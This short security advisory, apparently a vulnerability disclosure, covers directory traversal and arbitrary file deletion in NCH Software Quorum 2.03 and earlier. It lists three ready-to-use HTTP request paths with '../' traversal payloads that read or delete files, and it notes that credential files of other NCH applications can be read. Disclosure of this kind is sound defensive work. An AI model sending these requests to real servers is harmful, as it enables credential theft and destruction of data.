An authenticated user can view or delete any file on the remote system via path traversals in separate functions. This is dependent on the running context of the application. This can also be used to view credential files of other NCH applications often stored in \ProgramData\NCH Software\
.
Directory Traversal & Arbitrary File Deletion
NCH Software
Quorum 2.03 and earlier
Remote
Yes
HOST/logprop?file=/../../../../../../Windows/win.ini
(read)
HOST/documentprop?file=/../../../../../../Windows/win.ini&conference=<conferenceID>
(read)
HOST/documentdelete?file=/../../../../../../Windows/win.ini&conference=<conferenceID>
(delete)